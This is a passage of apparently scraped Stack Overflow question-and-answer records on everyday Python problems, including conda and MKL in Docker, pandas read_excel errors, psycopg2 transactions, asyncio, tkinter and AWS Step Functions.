RUN conda create -c conda-forge -n pymc3_env pymc3 numpy theano-pymc mkl mkl-service: \n#0 0.400 Collecting package metadata (current_repodata.json): ...working... done \n#0 9.148 Solving environment: ...working... failed with repodata from current_repodata.json, will retry with next repodata source. \n#0 9.149 Collecting package metadata (repodata.json): ...working... done \n#0 45.81 Solving environment: ...working... failed \n#0 45.82 \n#0 45.82 PackagesNotFoundError: The following packages are not available from current channels:\n#0 45.82 \n#0 45.82 - mkl-service\n#0 45.82 - mkl\n#0 45.82 \n#0 45.82 Current channels:\n#0 45.82 \n#0 45.82 - https:\/\/conda.anaconda.org\/conda-forge\/linux-aarch64\n#0 45.82 - https:\/\/conda.anaconda.org\/conda-forge\/noarch\n#0 45.82 - https:\/\/repo.anaconda.com\/pkgs\/main\/linux-aarch64\n#0 45.82 - https:\/\/repo.anaconda.com\/pkgs\/main\/noarch\n#0 45.82 - https:\/\/repo.anaconda.com\/pkgs\/r\/linux-aarch64\n#0 45.82 - https:\/\/repo.anaconda.com\/pkgs\/r\/noarch\n#0 45.82 \n#0 45.82 To search for alternate channels that may provide the conda package you're\n#0 45.82 looking for, navigate to\n#0 45.82 \n#0 45.82 https:\/\/anaconda.org\n#0 45.82 \n#0 45.82 and use the search bar at the top of the page.\n#0 45.82 \n#0 45.82 \n------\nfailed to solve: executor failed running [\/bin\/sh -c conda create -c conda-forge -n pymc3_env pymc3 numpy theano-pymc mkl mkl-service]: exit code: 1\n\n\nCan anybody help me to understand why conda could not find mkl and mkl-service in conda-forge channel and what do I need to resolve this?\nI am using macos as a host, if it is any concern.\nThanks in advance for any help.","Title":"unable to install mkl mkl-service using conda in docker","Tags":"python,linux,docker,anaconda,conda","AnswerCount":1,"A_Id":75375632,"Answer":"MKL only works for x86_64, that is the Docker image must use the platform linux\/amd64. So, either specify --platform=linux\/amd64 in the build command line or in the FROM.","Users Score":1,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75370722,"CreationDate":"2023-02-07 08:32:02","Q_Score":1,"ViewCount":56,"Question":"I am trying to get the last message that user 476686545034674176 sent in channel 1049386904065409054 and when I try to debug it, I either get a weird output or an error that says it is a Nonetype after I got an output that should trigger if it got a message.\nI tried:\n@client.event\nasync def on_ready():\n print('Logged in as')\n print(client.user.name)\n print(client.user.id)\n print('------')\n\n await tree.sync(guild=discord.Object(id=1049253865112997888))\n\n aviv_venting_about_his_shitass_brothers = client.get_channel(1049386904065409054)\n global last_message\n async for message in aviv_venting_about_his_shitass_brothers.history(limit=1000):\n if message.author.id == 476686545034674176:\n last_message = message\n\n if last_message is None:\n print('no messages found')\n elif last_message.content == None:\n print('invalid message')\n else:\n print(f'found message {last_message.content}')\n break\n\nThere is a line later in the code:\n await interaction.response.send_message(f'aviv last vented at {datetime.datetime.fromtimestamp(last_message.created_at).strftime(\"%Y-%m-%d %H:%M:%S\")} <@{interaction.user.id}>')\n\nand it gives me this error:\ndiscord.app_commands.errors.CommandInvokeError: Command 'last_vent' raised an exception: TypeError: 'datetime.datetime' object cannot be interpreted as an integer\nI expected to get an output when the bot starts up and I either get no output or 'found message'","Title":"How do I get the last message sent by a certain user in a certain channel with discord.py?","Tags":"python,discord.py","AnswerCount":1,"A_Id":75370912,"Answer":"Your problem is not that the bot doesn't find a matching message, its problem lies within the execution of the send_message command. Read the error message. You're trying to pass an invalid type for an argument. I am not familiar with the intricacies of discord.py, but if I could hazard a guess, last_message.created_at already is a datetime object.","Users Score":0,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75372032,"CreationDate":"2023-02-07 10:26:26","Q_Score":4,"ViewCount":157,"Question":"The subject contains the whole idea. I came accross code sample where it shows something like:\nasync for item in getItems():\n await item.process()\n\nAnd others where the code is:\nfor item in await getItems():\n await item.process()\n\nIs there a notable difference in these two approaches?","Title":"In Python, what is the difference between `async for x in async_iterator` and `for x in await async_iterator`?","Tags":"python,python-3.x,asynchronous,python-asyncio","AnswerCount":2,"A_Id":75373144,"Answer":"Those are completely different.\nThis for item in await getItems() won't work (will throw an error) if getItems() is an asynchronous iterator or asynchronous generator, it may be used only if getItems is a coroutine which, in your case, is expected to return a sequence object (simple iterable).\nasync for is a conventional (and pythonic) way for asynchronous iterations over async iterator\/generator.","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75372851,"CreationDate":"2023-02-07 11:40:36","Q_Score":1,"ViewCount":326,"Question":"I'm trying to use TA-lib for a hobby project. I found some code-snippets as reference telling me to do the following;\nimport talib as ta\nta.add_all_ta_features(\"some parameters here\")\n\ni get the following error when running the code:\nta.add_all_ta_features( AttributeError: module 'talib' has no attribute 'add_all_ta_features'\nIt looks like i need to manualy add all the features i want as i cant find the attribute .add_all_ta_features in the talib folder.\ni've installed TA-Lib and made it a 64-bit library using Visual studio and managed to run TA-Lib in other projects before but have never used the .add_all_ta_features-attribute.\nDoes anybody know how i can fix this? Google seems to not return any usefull results when searched for this. The documentation i'm following also does not mention anything about this attribute.\ni tried using pandas_ta and tried using the Google colab space, but both return the same error.","Title":"TA-LIB module has no attribute 'add_all_ta_features'","Tags":"python,ta-lib","AnswerCount":1,"A_Id":75382873,"Answer":"Found the problem. I was trying to use TA-Lib as TA, but nowhere was it specified that we need a seperate library, not findable through the python package mangager simply called TA.\nThanks!","Users Score":1,"is_accepted":false,"Score":0.1973753202,"Available Count":1},{"Q_Id":75374930,"CreationDate":"2023-02-07 14:42:37","Q_Score":1,"ViewCount":58,"Question":"I am trying to find all observations that are located within 100 meters of a set of coordinates.\nI have two dataframes, Dataframe1 has 400 rows with coordinates, and for each row, I need to find all the observations from Dataframe2 that are located within 100 meters of that location, and count them. Ideally,\nBoth the dataframes are formatted like this:\n| Y | X | observations_within100m |\n|:----:|:----:|:-------------------------:|\n|100 |100 | 22 |\n|110 |105 | 25 |\n|110 |102 | 11 |\n\n\nI am looking for the most efficient way to do this computation, as dataframe2 has over a 200 000 dwelling locations. I know it can be done with applying a distance function with something as a for loop but I was wondering what the best method is here.","Title":"Most resource-efficient way to calculate distance between coordinates","Tags":"python,pandas","AnswerCount":2,"A_Id":75375261,"Answer":"If there's a small area you're working on, you could make a grid of all known locations, then for each point precompute a list of which entries in df1 which are withing 100m from that point.\nStep 2 would be to go thru the 200k lines df2 and increase the count for the df1 entries found at the point correspondingly.\nOtherwise, this problem is similar to collision detection, for which there might be smart implementations. e.g. pygame has one, no idea though how efficient. Depending on how sparse the area is there might be gains thru dividing it into cells, so you'd only have to detect collision\/distance for the entries in that cell, decreasing from 400 objects you'd have to check against for each of the 200k.\nHope the answer was helpful and good luck!","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75375998,"CreationDate":"2023-02-07 16:02:56","Q_Score":1,"ViewCount":284,"Question":"My team is using AWS Glue endpoints to locally develop using VS code notebooks, this morning for some reason - our endpoints get the error below. Its 3 machines (Mac, Linux and Windows) that did not update anything and just suddenly got this error when trying to use the Glue endpoint. Anyone else getting this error? Whats even stranger is that the fourth developer, who does not have a different setup can still use the endpoint.\nIf I create a notebook using jupyter notebook and use the glue pyspark kernel there, it will work. Any attempt at updating or redownloading Python \/ the packages has no effect.\nWhen I add a print to this library I can see the Data object is empty. If I comment this line out I am unable to see outputs from my notebook.\nAnyone else getting this error?\nThe error:\nTrying to create a Glue session for the kernel.\nWorker Type: G.1X\nNumber of Workers: 2\nSession ID: 6f7ecef2-de6a-44fe-bbfc-bf8b1fa53ce5\nApplying the following default arguments:\n--glue_kernel_version 0.35\n--enable-glue-datacatalog true\n--additional-python-modules great-expectations==0.15.17\n--conf spark.sql.legacy.parquet.int96RebaseModeInWrite=CORRECTED --conf spark.sql.legacy.parquet.int96RebaseModeInRead=CORRECTED --conf spark.sql.legacy.parquet.datetimeRebaseModeInRead=CORRECTED\n--enable-job-insights true\nWaiting for session 6f7ecef2-de6a-44fe-bbfc-bf8b1fa53ce5 to get into ready status...\nSession 6f7ecef2-de6a-44fe-bbfc-bf8b1fa53ce5 has been created\n\nException encountered while running statement: 'TextPlain' \nTraceback (most recent call last):\n File \"\/home\/user\/.local\/lib\/python3.10\/site-packages\/aws_glue_interactive_sessions_kernel\/glue_pyspark\/GlueKernel.py\", line 163, in do_execute\n self._send_output(statement_output[\"Data\"][\"TextPlain\"])\nKeyError: 'TextPlain'","Title":"Exception encountered while running statement: 'TextPlain' for Glue session","Tags":"python,aws-glue","AnswerCount":1,"A_Id":75389505,"Answer":"I had the same issue but I managed to fix it by\ndowngrading to python3.9 from python3.10,\nupdated aws-glue-sessions to 0.37.0 from 0.35.0\nand downgrading psutil to 5.9.1.\nThere could potentially be other issues but those should be apparent in the \"Output\" tab in VSCode.","Users Score":1,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75378061,"CreationDate":"2023-02-07 19:23:42","Q_Score":1,"ViewCount":145,"Question":"Can mypy check that a NumPy array of floats is passed as a function argument? For the code below mypy is silent when an array of integers or booleans is passed.\nimport numpy as np\nimport numpy.typing as npt\n\ndef half(x: npt.NDArray[np.cfloat]):\n return x\/2\n\nprint(half(np.full(4,2.1)))\nprint(half(np.full(4,6))) # want mypy to complain about this\nprint(half(np.full(4,True))) # want mypy to complain about this","Title":"How to use mypy to ensure that a NumPy array of floats is passed as function argument?","Tags":"python,numpy,numpy-ndarray,mypy","AnswerCount":1,"A_Id":75378152,"Answer":"Mypy can check the type of values passed as function arguments, but it currently has limited support for NumPy arrays. You can use the numpy.typing.NDArray type hint, as in your code, to specify that the half function takes a NumPy array of complex floats as an argument. However, mypy will not raise an error if an array of integers or booleans is passed, as it currently cannot perform type-checking on the elements of the array. To ensure that only arrays of complex floats are passed to the half function, you will need to write additional runtime checks within the function to validate the input.","Users Score":1,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75378081,"CreationDate":"2023-02-07 19:26:13","Q_Score":1,"ViewCount":152,"Question":"I have two relatively large dataframes (less than 5MB), which I receive from my front-end as files via my API Gateway. I am able to receive the files and can print the dataframes in my receiver Lambda function. From my Lambda function, I am trying to invoke my state machine (which just cleans up the dataframes and does some processing). However, when passing my dataframe to my step function, I receive the following error:\nClientError: An error occurred (413) when calling the StartExecution operation: HTTP content length exceeded 1049600 bytes\n\nMy Receiver Lambda function:\ndict = {}\ndict['username'] = arr[0]\ndict['region'] = arr[1]\ndict['country'] = arr[2]\ndict['grid'] = arr[3]\ndict['physicalServers'] = arr[4] #this is one dataframe in json format\ndict['servers'] = arr[5] #this is my second dataframe in json format\n\nclient = boto3.client('stepfunctions')\nresponse = client.start_execution(\n stateMachineArn='arn:aws:states:us-west-2:##:stateMachine:MyStateMachineTest',\n name='testStateMachine',\n input= json.dumps(dict)\n)\n\nprint(response)\n\nIs there something I can do to pass in my dataframes to my step function? The dataframes contain sensitive customer data which I would rather not store in my S3. I realize I can store the files into S3 (directly from my front-end via pre-signed URLs) and then read the files from my step function but this is one of my least preferred approaches.","Title":"Passing in a dataframe to a stateMachine from Lambda","Tags":"python,pandas,amazon-web-services,aws-lambda,aws-step-functions","AnswerCount":1,"A_Id":75378554,"Answer":"Passing them as direct input via input= json.dumps(dict) isn't going to work, as you are finding. You are running up against the size limit of the request. You need to save the dataframes to a file, somewhere the step functions can access it, and then just pass the file paths as input to the step function.\nThe way I would solve this is to write the data frames to files in the Lambda file system, with some random ID, perhaps the Lambda invocation ID, in the filename. Then have the Lambda function copy those files to an S3 bucket. Finally invoke the step function with the S3 paths as part of the input.\nOver on the Step Functions side, have your state machine expect S3 paths for the physicalServers and servers input values, and use those paths to download the files from S3 during state machine execution.\nFinally, I would configure an S3 lifecycle policy on the bucket, to remove any objects more than a few days old (or whatever time makes sense for your application) so that the bucket doesn't get large and run up your AWS bill.\n\nAn alternative to using S3 would be to use an EFS volume mount in both this Lambda function, and in the Lambda function or (or EC2 or ECS) that your step function is executing. With EFS your code could write and read from it just like a local file system, which would eliminate the steps of copying to\/from S3, but you would have to add some code at the end of your step function to clean up the files after you are done since EFS won't do that for you.","Users Score":1,"is_accepted":false,"Score":0.1973753202,"Available Count":1},{"Q_Id":75380280,"CreationDate":"2023-02-08 00:18:28","Q_Score":1,"ViewCount":859,"Question":"I am trying to insert data into my database using psycopg2 and I get this weird error. I tried some things but nothing works. This is my code:\ndef insert_transaction():\nglobal username\nnow = datetime.now()\ndate_checkout = datetime.today().strftime('%d-%m-%Y')\ntime_checkout = now.strftime(\"%H:%M:%S\")\n\nusername = \"Peter1\"\n\nconnection_string = \"host='localhost' dbname='Los Pollos Hermanos' user='postgres' password='******'\"\nconn = psycopg2.connect(connection_string)\ncursor = conn.cursor()\ntry:\n query_check_1 = \"\"\"(SELECT employeeid FROM employee WHERE username = %s);\"\"\"\n cursor.execute(query_check_1, (username,))\n employeeid = cursor.fetchone()[0]\n conn.commit()\nexcept:\n print(\"Employee error\")\n\ntry:\n query_check_2 = \"\"\"SELECT MAX(transactionnumber) FROM Transaction\"\"\"\n cursor.execute(query_check_2)\n transactionnumber = cursor.fetchone()[0] + 1\n conn.commit()\nexcept:\n transactionnumber = 1\n\n\"\"\"\"---------INSERT INTO TRANSACTION------------\"\"\"\n\n\nquery_insert_transaction = \"\"\"INSERT INTO transactie (transactionnumber, date, time, employeeemployeeid)\n VALUES (%s, %s, %s, %s);\"\"\"\ndata = (transactionnumber, date_checkout, time_checkout, employeeid)\ncursor.execute(query_insert_transaction, data)\nconn.commit()\nconn.close()\n\nthis is the error:\n\", line 140, in insert_transaction\ncursor.execute(query_insert_transaction, data) psycopg2.errors.InFailedSqlTransaction: current transaction is aborted, commands ignored until end of transaction block","Title":"psycopg2.errors.InFailedSqlTransaction: current transaction is aborted, commands ignored until end of transaction block, dont know how to fix it","Tags":"python,sql,postgresql,psycopg2","AnswerCount":2,"A_Id":76561514,"Answer":"Executing the conn.rollback() function after checking for errors and executing the code again should help!","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75381096,"CreationDate":"2023-02-08 03:21:32","Q_Score":1,"ViewCount":204,"Question":"We are developing a prediction model using deepchem's GCNModel.\nModel learning and performance verification proceeded without problems, but it was confirmed that a lot of time was spent on prediction.\nWe are trying to predict a total of 1 million data, and the parameters used are as follows.\nmodel = GCNModel(n_tasks=1, mode='regression', number_atom_features=32, learning_rate=0.0001, dropout=0.2, batch_size=32, device=device, model_dir=model_path)\nI changed the batch size to improve the performance, and it was confirmed that the time was faster when the value was decreased than when the value was increased.\nAll models had the same GPU memory usage.\nFrom common sense I know, it is estimated that the larger the batch size, the faster it will be. But can you tell me why it works in reverse?\nWe would be grateful if you could also let us know how we can further improve the prediction time.","Title":"In deep learning, can the prediction speed increase as the batch size decreases?","Tags":"python,deep-learning,batchsize","AnswerCount":2,"A_Id":75381683,"Answer":"There are two components regarding the speed:\n\nYour batch size and model size\nYour CPU\/GPU power in spawning and processing batches\n\nAnd two of them need to be balanced. For example, if your model finishes prediction of this batch, but the next batch is not yet spawned, you will notice a drop in GPU utilization for a brief moment. Sadly there is no inner metrics that directly tell you this balance - try using time.time() to benchmark your model's prediction as well as the dataloader speed.\nHowever, I don't think that's worth the effort, so you can keep decreasing the batch size up to the point there is no improvement - that's where to stop.","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75381830,"CreationDate":"2023-02-08 05:53:21","Q_Score":1,"ViewCount":113,"Question":"I have python script to copy data from excel to CSV file. I have created Execute Process Task package in SSIS and deployed to SSISDB. This works fine when i execute in SSIS and in SSISDB manually.However,if i schedule or execute through SQL server agent it fails. I am using proxy account to schedule package. Other \"non python SSIS package\" runs fine in sql server agent.\nError -\n\nExecute PY Script:Error: In Executing C:\\Program\nFiles\\Python311\\python.exe\" \"\\\\org\\data\\project\\test.py\" at\n\"\\\\org\\data\\project\", The process exit code was \"1\" while the\nexpected was \"0\".\n\nPython Script -\nprint('Start CSV File Conversion') \nimport pandas as pd\nfrom pandas import DataFrame, read_csv\nfile = r'\\\\\\org\\data\\project\\test.xlsm'\ndframe = pd.read_excel(file, sheet_name='data')\nexport_csv = dframe.to_csv( R'\\\\\\org\\data\\project\\test.csv', index=None, header=True, sep='~')\nprint(dframe)\nprint('...Completed')\n\nAll Files are saved in \\\\org\\data\\project\nI am learning pyhton. Any inputs will be helpful.\nThank you.","Title":"SSIS package fails in SQL server Agent","Tags":"python,sql-server,ssis","AnswerCount":1,"A_Id":75396800,"Answer":"that doesn't look like ssis related error but python error. Check your code, may be create VS project where you can test it to escape complexity of running through SSIS.","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75382340,"CreationDate":"2023-02-08 07:02:00","Q_Score":1,"ViewCount":3562,"Question":"I dont know why this error occurs.\npd.read_excel('data\/A.xlsx', usecols=[\"B\", \"C\"])\n\nThen I get this error:\n\"Value must be either numerical or a string containing a wild card\"\n\nSo i change my code use nrows all data\npd.read_excel('data\/A.xlsx', usecols=[\"B\",\"C\"], nrows=172033)\n\nThen there is no error and a dataframe is created.\nmy excel file has 172034 rows, 1st is column name.","Title":"python pandas read_excel error \"Value must be either numerical or a string containing a wild card\"","Tags":"python,excel,pandas","AnswerCount":1,"A_Id":75764831,"Answer":"If you deselect all your filters the read_excel function should work.","Users Score":6,"is_accepted":false,"Score":1.0,"Available Count":1},{"Q_Id":75384904,"CreationDate":"2023-02-08 11:08:54","Q_Score":2,"ViewCount":76,"Question":"I need one help regarding killing application in linux\nAs manual process I can use command -- ps -ef | grep \"app_name\" | awk '{print $2}'\nIt will give me jobids and then I will kill using command \" kill -9 jobid\".\nI want to have python script which can do this task.\nI have written code as\nimport os\nos.system(\"ps -ef | grep app_name | awk '{print $2}'\")\n\nthis collects jobids. But it is in \"int\" type. so I am not able to kill the application.\nCan you please here?\nThank you","Title":"Kill application in linux using python","Tags":"python,linux","AnswerCount":2,"A_Id":75385024,"Answer":"To kill a process in Python, call os.kill(pid, sig), with sig = 9 (signal number for SIGKILL) and pid = the process ID (PID) to kill.\nTo get the process ID, use os.popen instead of os.system above. Alternatively, use subprocess.Popen(..., stdout=subprocess.PIPE). In both cases, call the .readline() method, and convert the return value of that to an integer with int(...).","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75384957,"CreationDate":"2023-02-08 11:13:14","Q_Score":1,"ViewCount":789,"Question":"We have a poetry project with a pyproject.toml file like this:\n[tool.poetry]\nname = \"daisy\"\nversion = \"0.0.2\"\ndescription = \"\"\nauthors = [\"\"]\n\n[tool.poetry.dependencies]\npython = \"^3.9\"\npandas = \"^1.5.2\"\nDateTime = \"^4.9\"\nnames = \"^0.3.0\"\nuuid = \"^1.30\"\npyyaml = \"^6.0\"\npsycopg2-binary = \"^2.9.5\"\nsqlalchemy = \"^2.0.1\"\npytest = \"^7.2.0\"\n\n[tool.poetry.dev-dependencies]\njupyterlab = \"^3.5.2\"\nline_profiler = \"^4.0.2\"\nmatplotlib = \"^3.6.2\"\nseaborn = \"^0.12.1\"\n\n[build-system]\nrequires = [\"poetry-core>=1.0.0\"]\nbuild-backend = \"poetry.core.masonry.api\"\n\nWhen I change the file to use Python 3.11 and run poetry update we get the following error:\nCurrent Python version (3.9.7) is not allowed by the project (^3.11).\nPlease change python executable via the \"env use\" command.\n\nI only have one env:\n> poetry env list\ndaisy-Z0c0FuMJ-py3.9 (Activated)\n\nStrangely this issue does not occur on my Macbook, only on our Linux machine.","Title":"Current Python version (3.9.7) is not allowed by the project (^3.11)","Tags":"python,python-poetry","AnswerCount":1,"A_Id":75394642,"Answer":"Poetry cannot update the Python version of an existing venv. Remove the existing one and run poetry install again.","Users Score":1,"is_accepted":false,"Score":0.1973753202,"Available Count":1},{"Q_Id":75386792,"CreationDate":"2023-02-08 13:54:05","Q_Score":1,"ViewCount":783,"Question":"When I try to read a xlsx file using pandas, I receive the error \"numpy has no float attribute\", but I'm not using numpy in my code, I get this error when using the code below\ninfo = pd.read_excel(path_info)\nThe xlsx file I'm using has just some letters inside of it for test purpouses, there's no numbers or floats.\nWhat I want to know is how can I solve that bug or error.\nI tried to create different files, change my info type to specify a pd.dataframe too\nPython Version 3.11\nPandas Version 1.5.3","Title":"Numpy has no float attribute error when using Read_Excel","Tags":"python,excel,pandas,numpy","AnswerCount":2,"A_Id":75415344,"Answer":"Had the same problem. Fixed it by updating openpyxl to latest version.","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75387489,"CreationDate":"2023-02-08 14:49:43","Q_Score":1,"ViewCount":49,"Question":"I have a dataframe 'qbPast' which contains nfl player data for a season.\nP Player Week Team Opp Opp Rank Points Def TD Def INT Def Yds\/att Year\n2 QB Kyler Murray 2 ARI MIN 14 38.10 1.8125 1.0000 6.9 2021\n3 QB Lamar Jackson 2 BAL KC 6 37.26 1.6875 0.9375 7 2021\n5 QB Tom Brady 2 TB ATL 28 30.64 1.9375 0.7500 6.8 2021\n\nI am attempting to create a new rolling average based on the \"Points\" column for each individual player for each 3 week period, for the first two weeks it should just return the points for that week and after that it should return the average for the 3 week moving period e,g Player A scores 20,30,40,30,40 the average should return 20,30,30,33.3 etc.\nMy attempt # qbPast['Avg'] = qbPast.groupby('Player')['Points'].rolling(3).mean().reset_index(drop=True) \nThe problem is it is only returning the 3 week average for all players I need it to filter by player so that it returns the rolling average for each player, the other players should not affect the rolling average.","Title":"Rolling average Pandas for 3 week period for specific column values","Tags":"python,pandas,dataframe","AnswerCount":3,"A_Id":75387668,"Answer":"You have to change the .reset_index(drop=True) into .reset_index(0, drop=True) so it is not mixing the players indices together.","Users Score":1,"is_accepted":false,"Score":0.0665680765,"Available Count":1},{"Q_Id":75387600,"CreationDate":"2023-02-08 14:57:59","Q_Score":9,"ViewCount":3917,"Question":"I can read an Excel file from pandas as usual:\ndf = pd.read_excel(join(\".\/data\", file_name) , sheet_name=\"Sheet1\")\n\nI got the following error:\n\nValueError: Value must be either numerical or a string containing a\nwildcard\n\nWhat I'm doing wrong?\nI'm using: Pandas 1.5.3 + python 3.11.0 + xlrd 2.0.1","Title":"Unable to read an Excel file using Pandas","Tags":"pandas,openpyxl,xlrd,python-3.11","AnswerCount":3,"A_Id":76631500,"Answer":"For people like me who are wondering what sort and filter is, it is an option in your Excel viewer. If you are using Microsoft Excel, you can go to the tab \"Home\" and then to the right side of the tab, you can find Sort & Filter, from there select Clear.","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":2},{"Q_Id":75387600,"CreationDate":"2023-02-08 14:57:59","Q_Score":9,"ViewCount":3917,"Question":"I can read an Excel file from pandas as usual:\ndf = pd.read_excel(join(\".\/data\", file_name) , sheet_name=\"Sheet1\")\n\nI got the following error:\n\nValueError: Value must be either numerical or a string containing a\nwildcard\n\nWhat I'm doing wrong?\nI'm using: Pandas 1.5.3 + python 3.11.0 + xlrd 2.0.1","Title":"Unable to read an Excel file using Pandas","Tags":"pandas,openpyxl,xlrd,python-3.11","AnswerCount":3,"A_Id":75404407,"Answer":"I got the same issue and then realized that the sheet I was reading is in \"filtering\" mode. Once I deselect \"sort&filter\", the read_excel function works.","Users Score":14,"is_accepted":true,"Score":1.2,"Available Count":2},{"Q_Id":75387699,"CreationDate":"2023-02-08 15:04:55","Q_Score":1,"ViewCount":46,"Question":"I'm trying to show a list of elements from a data set in a tkinter window. I want to able to manipulate the elements, by highlighting, deleting etc.\nI have this code:\nfrom tkinter import *\n\nwindow = Tk()\nwindow.geometry(\"100x100\")\n\n#data from API\ndata_list = [\n [\"1\", \"Lorem\"],\n [\"2\", \"Lorem\"],\n [\"3\", \"Lorem\"],\n [\"4\", \"Lorem\"]\n]\n\n#create selectable rectangles from data_list with delete buttons\nrectangles = {}\ndelete_buttons = {}\n\ndef CreateRectangles():\n i = 0\n for data in data_list:\n rectangles[i] = Canvas(window, bg=\"#BFBFBF\", height=15, width=80)\n rectangles[i].place(x=19, y=20.0 + (i * 19))\n rectangles[i].create_text(5.0, 1.0, anchor=\"nw\", text=str(f'#{data[0]}:{data[1]}'))\n\n delete_buttons[i] = Label(window, text=\"X \", bg=\"#D9D9D9\")\n delete_buttons[i].place(x=6, y=20.0 + (i * 19))\n\n i += 1\n\nCreateRectangles()\n\n#highlight clicked rectangle\ndef RectangleClick(e, arg):\n #reset how all rectangles look\n for i in rectangles:\n rectangles[i].config(bg=\"#BFBFBF\")\n #highlight the one clicked\n rectangles[arg].config(bg=\"#999999\")\n\nfor key in rectangles:\n rectangles[key].bind(\"\", lambda event, arg=key: RectangleClick(event, arg))\n\n#delete button action\ndef DeleteClick(e, arg):\n # delete all rectangles and buttons from window\n for rectangle in rectangles:\n rectangles[rectangle].place_forget()\n for delete in delete_buttons:\n delete_buttons[delete].destroy()\n\n # delete all rectangles and buttons from dictionary\n rectangles.clear()\n delete_buttons.clear()\n\n # delete the specific data from de data_list\n data_list.pop(arg)\n\n # re do everything but now the data list has one less item\n CreateRectangles()\n\nfor num in delete_buttons:\n delete_buttons[num].bind(\"\", lambda event, arg=num: DeleteClick(event, arg))\n\nwindow.mainloop()\n\nIt only works the first time. For example, if I delete an item, it doesn't do anything else.\nWhat's wrong?","Title":"Python dictionary, list and for-loop bug","Tags":"python,function,dictionary,for-loop,tkinter","AnswerCount":1,"A_Id":75387728,"Answer":"Move all the code that binds event handlers inside the CreateRectangles method. Since all the previous rectangles are destroyed, the event handlers need to be attached again.","Users Score":1,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75388233,"CreationDate":"2023-02-08 15:43:34","Q_Score":1,"ViewCount":48,"Question":"Brief explanation of my program (or what it's meant to do):\nI have created a simulation program that models amoeba populations in Pygame. The program uses two classes - Main and Amoeba. The Main class runs the simulation and displays the results on a Pygame window and a Matplotlib plot. The Amoeba class models the properties and behavior of each amoeba in the population, including its maturing speed, age, speed, and movement direction. The simulation runs in a loop until the \"q\" key is pressed or the simulation is stopped. The GUI is created using the Tkinter library, which allows the user to interact with the simulation by starting and stopping it. The simulation updates the amoeba population and displays their movements on the Pygame window and updates the Matplotlib plot every 100 steps. The plot displays the average maturing speed and the reproduction rate of the amoeba population.\nMy issue is that whilst the stop button in the GUI works fine, the start button does not. It registers being pressed and actually outputs the variable it is meant to change to the terminal (the running variable which you can see more of in the code). So the issue is not in the button itself, but rather the way in which the program is restarted. I have tried to do this via if statements and run flags but it has failed. There are no error messages, the program just remains paused.\nHere is the code to run the simulation from my Main.py file (other initialisation code before this):\ndef run_simulation():\n global step_counter\n global num_collisions\n global run_flag\n while run_flag:\n\n if globalvars.running:\n #main code here\n \n else:\n run_flag = False\n\n\ngc.root = tk.Tk()\napp = gc.GUI(gc.root)\napp.root.after(100, run_simulation)\ngc.root.mainloop()\n\nThis is the code from my GUI class:\nimport tkinter as tk\nimport globalvars\n\nclass GUI:\n def __init__(self,root):\n self.root = root\n self.root.title(\"Graphical User Interface\")\n self.root.geometry(\"200x200\")\n self.startbutton = tk.Button(root, bg=\"green\", text=\"Start\", command=self.start)\n self.startbutton.pack()\n self.stopbutton = tk.Button(root, bg=\"red\", text=\"Stop\", command=self.stop)\n self.stopbutton.pack()\n \n def start(self):\n globalvars.running = True\n print(globalvars.running)\n \n def stop(self):\n globalvars.running = False\n print(globalvars.running)\n\nAlso in a globalvars.py file I store global variables which includes the running var.\nWould you mind explaining the issue please?","Title":"Tkinter GUI start button registering input but not restarting program","Tags":"python,tkinter","AnswerCount":1,"A_Id":75394947,"Answer":"There's a logic error in the application: when stop() is called it sets globalvars.running = False. This means, in run_simulation() the else branch is executed which turns run_flag = False.\nThis variable is never reset to True!\nSo the while loop is left and never entered again and #main code here not executed.\nIn addition to setting run_flag = True, function run_simulation() needs to be called from start().\nTurned my earlier comment into an answer so it can be accepted and the question resolved.","Users Score":1,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75389906,"CreationDate":"2023-02-08 17:58:14","Q_Score":1,"ViewCount":133,"Question":"I am using asyncio.gather to run many query to an API. My main goal is to execute them all without waiting one finish for start another one.\nasync def main(): \n order_book_coroutines = [asyncio.ensure_future(get_order_book_list()) for exchange in exchange_list]\n results = await asyncio.gather(*order_book_coroutines)\n\n\n\nasync def get_order_book_list():\n print('***1***')\n sleep(10)\n try:\n #doing API query\n except Exception as e:\n pass\n print('***2***')\n\nif __name__ == \"__main__\":\n asyncio.run(main())\n\nMy main problem here is the ouput :\n***1***\n***2***\n***1***\n***2***\n***1***\n***2***\n\nI was waiting something like :\n***1***\n***1***\n***1***\n***2***\n***2***\n***2***\n\nThere is a problem with my code ? or i miss understood asyncio.gather utility ?","Title":"asyncio.gather doesn't execute my task in same time","Tags":"python,python-asyncio","AnswerCount":1,"A_Id":75390156,"Answer":"Is there a problem with my code? Or I misunderstood the asyncio.gather utility?\n\nNo, you did not. The expected output would be shown if you used await asyncio.sleep(10) instead of time.sleep(10) which blocks the main thread for the given time, while the asyncio.sleep blocks only the current coroutine concurrently running the next get_order_book_list of the order_book_coroutines list.","Users Score":2,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75390077,"CreationDate":"2023-02-08 18:13:57","Q_Score":1,"ViewCount":93,"Question":"I have this code in Python to download videos from Pexels. My problem is i can't change the resolution of the videos that will be downloaded.\nimport time\nfrom selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\nimport os\nfrom requests import get\nimport requests\nfrom bs4 import BeautifulSoup\nfrom itertools import islice\nimport moviepy.editor as mymovie\nimport random\n# specify the URL of the archive here\nurl = \"https:\/\/www.pexels.com\/search\/videos\/sports%20car\/?size=medium\"\nvideo_links = []\n\n#getting all video links\ndef get_video_links():\n options = webdriver.ChromeOptions()\n options.add_argument(\"--lang=en\")\n browser = webdriver.Chrome(executable_path=ChromeDriverManager().install(), options=options)\n browser.maximize_window()\n time.sleep(2)\n browser.get(url)\n 